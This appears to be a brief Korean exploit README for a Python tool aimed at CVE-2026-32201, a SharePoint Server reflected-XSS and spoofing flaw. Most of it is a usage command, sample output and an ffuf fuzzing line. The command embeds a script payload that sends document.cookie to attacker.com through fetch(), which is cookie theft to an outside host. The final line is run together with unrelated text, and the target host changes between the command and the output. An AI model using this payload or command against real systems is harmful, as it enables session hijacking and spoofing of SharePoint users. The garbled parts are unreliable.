
Python 익스플로잇 for CVE-2026-32201, Microsoft SharePoint Server의 반사형 XSS 취약점으로, 조작된 HTTP 요청을 통해 인증되지 않은 스푸핑 및 데이터 변조를 가능하게 합니다.
CVE-2026-32201에 대한 Python 익스플로잇 - Microsoft SharePoint Server의 부적절한 입력 검증으로, 인증되지 않은 네트워크 스푸핑을 허용합니다 (C:L/I:L).
python3 exploit.py https://sharepoint.target.com \
--recipient [email protected] \
--sender "[email protected]" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
출력 예시:
[+] SharePoint 감지됨.
[*] https://target.com/_layouts/15/notify.aspx로 스푸핑 요청 전송 중
[+] 상태: 200
[+] 잠재적 성공: 스푸핑된 콘텐츠에 대해 대상 로그/이메일 확인.
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt--message에 JS 추가